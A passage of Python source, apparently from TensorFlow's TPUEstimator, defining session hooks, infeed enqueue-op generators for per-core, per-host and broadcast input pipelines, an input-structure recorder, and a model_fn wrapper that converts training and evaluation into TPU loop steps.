self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping singal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation,
experimental_export_device_assignment):
"""Call computation.
Args:
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_export_device_assignment: If `True`, use user-provided device
assignment. If `False`, round-robin computation among all TPU cores
visible to the host.
Returns:
A list of output tensors.
"""
if experimental_export_device_assignment:
return computation()
else:
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation()
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_)
)
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(scaled_gradients)
]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
host_call.record({
'host_call': (lambda loss_t: loss_t,
[array_ops.reshape(loss, [1])])
})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, False)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
